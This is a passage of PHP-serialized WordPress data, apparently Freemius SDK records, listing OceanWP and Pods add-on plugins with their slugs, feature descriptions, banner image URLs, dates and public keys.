Extra\";s:4:\"slug\";s:11:\"ocean-extra\";s:12:\"premium_slug\";s:19:\"ocean-extra-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3806\";s:11:\"description\";s:759:\"<ul>\n<li style=\"color: #333;font-weight: 600\">Meta Boxes</li>\n<li>Change the layout per page/post</li>\n<li>Select the sidebar per page/post</li>\n<li>Enable/Disable the margins top/bottom</li>\n<li>Enable/Disable the title</li>\n<li>Add a custom title</li>\n<li>Add a subheading for your title</li>\n<li>Select the style of your title</li>\n<li>Unique options for the different post format</li>\n<li>Add gallery image for the gallery post format</li>\n<li>And much more...</li>\n<li style=\"color: #333;font-weight: 600;margin-top: 20px\">Theme Panel</li>\n<li>Enable/Disable the Customizer panels</li>\n<li>Activate the licenses of the OceanWP extensions</li>\n<li>Enable/Disable all the theme scripts &amp; styles</li>\n<li>Import/Export the customizer settings</li> </ul>\";s:17:\"short_description\";N;s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3806/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3806/card_banner.png\";s:15:\"selling_point_0\";s:31:\"Change the layout per page/post\";s:15:\"selling_point_1\";s:32:\"Select the sidebar per page/post\";s:15:\"selling_point_2\";s:45:\"Add gallery image for the gallery post format\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3806/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3806/screenshots/2.png\";}s:2:\"id\";s:3:\"832\";s:7:\"updated\";s:19:\"2019-08-04 07:50:27\";s:7:\"created\";s:19:\"2019-05-16 08:37:18\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_dc69e18411e45b6f22272ac4586b1\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3806\";s:7:\"updated\";s:19:\"2019-05-16 07:48:04\";s:7:\"created\";s:19:\"2019-05-16 07:48:04\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:15;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Social Sharing\";s:4:\"slug\";s:20:\"ocean-social-sharing\";s:12:\"premium_slug\";s:28:\"ocean-social-sharing-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3807\";s:11:\"description\";s:336:\"<ul>\n<li>Add social networks: Twitter, Facebook, LinkedIn, Google+, Pinterest, Viber, VK, Reddit, Tumblr and Viadeo.</li>\n<li>Alter the social sharing buttons.</li>\n<li>Choose between three styles.</li>\n<li>Add the social names.</li>\n<li>Choose the heading position.</li>\n<li>Add or edit the social sharing via a child theme.</li> </ul>\";s:17:\"short_description\";s:58:\"A simple plugin to add social share buttons to your posts.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/card_banner.png\";s:15:\"selling_point_0\";s:106:\"Add social networks: Twitter, Facebook, LinkedIn, Google+, Pinterest, Viber, VK, Reddit, Tumblr and Viadeo\";s:15:\"selling_point_1\";s:32:\"Alter the social sharing buttons\";s:15:\"selling_point_2\";s:27:\"Choose between three styles\";s:11:\"screenshots\";O:8:\"stdClass\":4:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/screenshots/2.png\";s:12:\"screenshot_3\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3807/screenshots/3.png\";}s:2:\"id\";s:3:\"838\";s:7:\"updated\";s:19:\"2019-08-04 08:00:26\";s:7:\"created\";s:19:\"2019-05-16 08:44:21\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_0aa6121ff893b29efa9a58d6c0ad5\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3807\";s:7:\"updated\";s:19:\"2021-08-15 20:43:37\";s:7:\"created\";s:19:\"2019-05-16 07:53:38\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:16;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:21:\"Ocean Product Sharing\";s:4:\"slug\";s:21:\"ocean-product-sharing\";s:12:\"premium_slug\";s:29:\"ocean-product-sharing-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3809\";s:11:\"description\";s:177:\"<ul>\n<li>Add social twitter, facebook, pinterest and email sharing</li>\n<li>Alter the social sharing buttons</li>\n<li>Add or edit the social sharing via a child theme</li> </ul>\";s:17:\"short_description\";s:121:\"A simple plugin to add social share buttons to your product page, compatible with WooCommerce and Easy Digital Downloads.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3809/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3809/card_banner.png\";s:15:\"selling_point_0\";s:57:\"Add social twitter, facebook, pinterest and email sharing\";s:15:\"selling_point_1\";s:32:\"Alter the social sharing buttons\";s:15:\"selling_point_2\";s:48:\"Add or edit the social sharing via a child theme\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3809/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3809/screenshots/2.png\";}s:2:\"id\";s:3:\"837\";s:7:\"updated\";s:19:\"2019-08-04 07:55:00\";s:7:\"created\";s:19:\"2019-05-16 08:43:10\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e8cc3b7980be98f86dc7286572cc0\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3809\";s:7:\"updated\";s:19:\"2021-08-15 20:43:36\";s:7:\"created\";s:19:\"2019-05-16 08:00:39\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:17;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Custom Sidebar\";s:4:\"slug\";s:20:\"ocean-custom-sidebar\";s:12:\"premium_slug\";s:28:\"ocean-custom-sidebar-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3810\";s:11:\"description\";s:58:\"<ul>\n<li>Create an unlimited number of sidebars</li> </ul>\";s:17:\"short_description\";s:136:\"Generates an unlimited number of sidebars and place them anywhere you wish. Go to Theme Panel > Sidebars to create your custom sidebars.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3810/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3810/card_banner.png\";s:15:\"selling_point_0\";s:38:\"Create an unlimited number of sidebars\";s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3810/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3810/screenshots/2.png\";}s:2:\"id\";s:3:\"833\";s:7:\"updated\";s:19:\"2019-08-04 07:47:46\";s:7:\"created\";s:19:\"2019-05-16 08:38:20\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e1fc615375e847fd4d955c62b2a34\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3810\";s:7:\"updated\";s:19:\"2021-08-15 19:50:51\";s:7:\"created\";s:19:\"2019-05-16 08:04:08\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:18;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean Demo Import\";s:4:\"slug\";s:17:\"ocean-demo-import\";s:12:\"premium_slug\";s:27:\"activity-log-mainwp-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3811\";s:11:\"description\";s:55:\"<ul>\n<li>Import the sample data in one click</li> </ul>\";s:17:\"short_description\";s:80:\"Import the OceanWP demo content, widgets and customizer settings with one click.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3811/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3811/card_banner.png\";s:15:\"selling_point_0\";s:35:\"Import the sample data in one click\";s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3811/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3811/screenshots/2.png\";}s:2:\"id\";s:3:\"834\";s:7:\"updated\";s:19:\"2019-08-04 07:48:57\";s:7:\"created\";s:19:\"2019-05-16 08:39:11\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_28285e0f391b4955f4460589da147\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3811\";s:7:\"updated\";s:19:\"2021-08-15 19:48:11\";s:7:\"created\";s:19:\"2019-05-16 08:06:15\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:19;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:18:\"Ocean Posts Slider\";s:4:\"slug\";s:18:\"ocean-posts-slider\";s:12:\"premium_slug\";s:26:\"ocean-posts-slider-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3813\";s:11:\"description\";s:373:\"<ul>\n<li>Choose your slider style</li>\n<li>Enter the number of posts to display</li>\n<li>Select the size of the images</li>\n<li>Change the read more text</li>\n<li>Enter a margin to add a space between the slider and your content</li>\n<li>Enter the transition speed of the slides</li>\n<li>Exclude categories of posts</li>\n<li>Choose the order and oder by of posts</li> </ul>\";s:17:\"short_description\";s:71:\"Display your latest posts in a beautiful slider with different options.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3813/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3813/card_banner.png\";s:15:\"selling_point_0\";s:24:\"Choose your slider style\";s:15:\"selling_point_1\";s:36:\"Enter the number of posts to display\";s:15:\"selling_point_2\";s:29:\"Select the size of the images\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3813/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3813/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3813/screenshots/2.png\";}s:2:\"id\";s:3:\"836\";s:7:\"updated\";s:19:\"2019-08-04 07:53:25\";s:7:\"created\";s:19:\"2019-05-16 08:42:09\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_eae1ef26c136dd8af5ef7a6cf7557\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3813\";s:7:\"updated\";s:19:\"2021-08-15 20:53:14\";s:7:\"created\";s:19:\"2019-05-16 08:08:26\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:20;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:18:\"Ocean Modal Window\";s:4:\"slug\";s:18:\"ocean-modal-window\";s:12:\"premium_slug\";s:26:\"ocean-modal-window-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3814\";s:11:\"description\";s:203:\"<ul>\n<li>Create as many modals as you want</li>\n<li>Choose your custom width</li>\n<li>Insert the content you want (shortcodes allowed)</li>\n<li>Choose your own colors</li>\n<li>Fully responsive</li> </ul>\";s:17:\"short_description\";s:80:\"Insert any content in a modals and place the opening button anywhere to open it.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3814/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3814/card_banner.png\";s:15:\"selling_point_0\";s:33:\"Create as many modals as you want\";s:15:\"selling_point_1\";s:24:\"Choose your custom width\";s:15:\"selling_point_2\";s:48:\"Insert the content you want (shortcodes allowed)\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3814/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3814/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3814/screenshots/2.png\";}s:2:\"id\";s:3:\"835\";s:7:\"updated\";s:19:\"2019-08-04 07:51:54\";s:7:\"created\";s:19:\"2019-05-16 08:40:03\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_7e254472063a1abd3b7e342930210\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3814\";s:7:\"updated\";s:19:\"2021-08-15 17:17:23\";s:7:\"created\";s:19:\"2019-05-16 08:10:28\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:21;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Stick Anything\";s:4:\"slug\";s:20:\"ocean-stick-anything\";s:12:\"premium_slug\";s:28:\"ocean-stick-anything-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3815\";s:11:\"description\";s:190:\"<ul>\n<li>Stick one or several elements</li>\n<li>Add an offset to add a spacing between the top of the page and your sticky element</li>\n<li>Destroy the sticky on the size you want</li>\n</ul>\";s:17:\"short_description\";s:43:\"A simple plugin to stick anything you want.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3815/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3815/card_banner.png\";s:15:\"selling_point_0\";s:29:\"Stick one or several elements\";s:15:\"selling_point_1\";s:82:\"Add an offset to add a spacing between the top of the page and your sticky element\";s:15:\"selling_point_2\";s:39:\"Destroy the sticky on the size you want\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3815/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3815/screenshots/2.png\";}s:2:\"id\";s:3:\"839\";s:7:\"updated\";s:19:\"2019-08-04 08:03:54\";s:7:\"created\";s:19:\"2019-05-16 08:45:08\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_f9a790f52e74ee60eb2812ba763dd\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3815\";s:7:\"updated\";s:19:\"2021-08-15 19:51:10\";s:7:\"created\";s:19:\"2019-05-16 08:12:51\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:5347;a:5:{i:0;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"5347\";s:5:\"title\";s:22:\"Pods Alternative Cache\";s:4:\"slug\";s:22:\"pods-alternative-cache\";s:12:\"premium_slug\";s:33:\"pods-simple-relationships-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"5348\";s:11:\"description\";N;s:17:\"short_description\";s:124:\"Alternative caching engine for Pods for large sites on hosts with hard limits on how much you can store in the object cache.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5348/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5348/card_banner.png\";s:15:\"selling_point_0\";N;s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";N;s:2:\"id\";s:4:\"1352\";s:7:\"updated\";s:19:\"2020-03-18 23:02:11\";s:7:\"created\";s:19:\"2020-01-16 15:38:46\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_c51e7ff51e827ecaddb23664c050d\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5348\";s:7:\"updated\";s:19:\"2021-04-19 10:19:34\";s:7:\"created\";s:19:\"2020-01-16 15:35:45\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:1;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"5347\";s:5:\"title\";s:18:\"Pods Beaver Themer\";s:4:\"slug\";s:33:\"pods-beaver-builder-themer-add-on\";s:12:\"premium_slug\";s:41:\"pods-beaver-builder-themer-add-on-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"5349\";s:11:\"description\";N;s:17:\"short_description\";s:94:\"Integration with Beaver Builder Themer. Provides a UI for mapping Field Connections with Pods.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5349/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5349/card_banner.png\";s:15:\"selling_point_0\";N;s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";N;s:2:\"id\";s:4:\"1503\";s:7:\"updated\";s:19:\"2020-03-23 13:29:21\";s:7:\"created\";s:19:\"2020-03-18 16:27:22\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_d8a10a25a662419add4ff3fbcc493\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5349\";s:7:\"updated\";s:19:\"2021-04-18 16:15:28\";s:7:\"created\";s:19:\"2020-01-16 15:37:32\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:2;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"5347\";s:5:\"title\";s:8:\"Pods SEO\";s:4:\"slug\";s:8:\"pods-seo\";s:12:\"premium_slug\";s:16:\"pods-seo-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"5753\";s:11:\"description\";s:0:\"\";s:17:\"short_description\";s:114:\"Integrates with WP SEO Analysis for custom fields and Pods Advanced Content Types with WordPress SEO XML Sitemaps.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5753/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5753/card_banner.png\";s:15:\"selling_point_0\";N;s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";N;s:2:\"id\";s:4:\"1505\";s:7:\"updated\";s:19:\"2020-03-18 23:05:03\";s:7:\"created\";s:19:\"2020-03-18 16:41:19\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_46fa00cfe39af82dd1ed03033bea4\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5753\";s:7:\"updated\";s:19:\"2021-04-16 09:11:47\";s:7:\"created\";s:19:\"2020-03-18 16:30:02\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"5347\";s:5:\"title\";s:18:\"Pods Gravity Forms\";s:4:\"slug\";s:18:\"pods-gravity-forms\";s:12:\"premium_slug\";s:26:\"pods-gravity-forms-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"5754\";s:11:\"description\";N;s:17:\"short_description\";s:90:\"Integration with Gravity Forms. Provides a UI for mapping a Form\'s submissions into a Pod.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5754/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5754/card_banner.png\";s:15:\"selling_point_0\";N;s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";N;s:2:\"id\";s:4:\"1506\";s:7:\"updated\";s:19:\"2020-03-23 13:27:45\";s:7:\"created\";s:19:\"2020-03-18 22:53:21\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_1aaaee6bf8963f2077405e84f2ac5\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5754\";s:7:\"updated\";s:19:\"2021-04-16 08:43:21\";s:7:\"created\";s:19:\"2020-03-18 16:40:29\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:4;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"5347\";s:5:\"title\";s:15:\"Pods AJAX Views\";s:4:\"slug\";s:15:\"pods-ajax-views\";s:12:\"premium_slug\";s:23:\"pods-ajax-views-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:0;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"5755\";s:11:\"description\";N;s:17:\"short_description\";s:81:\"An easy way to generate cached views from AJAX when they haven\'t been cached yet.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5755/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/5755/card_banner.png\";s:15:\"selling_point_0\";N;s:15:\"selling_point_1\";N;s:15:\"selling_point_2\";N;s:11:\"screenshots\";N;s:2:\"id\";s:4:\"1507\";s:7:\"updated\";s:19:\"2020-03-18 23:00:49\";s:7:\"created\";s:19:\"2020-03-18 22:54:20\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_8606e36bd5153a1faf1e041342634\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5755\";s:7:\"updated\";s:19:\"2021-04-05 04:09:48\";s:7:\"created\";s:19:\"2020-03-18 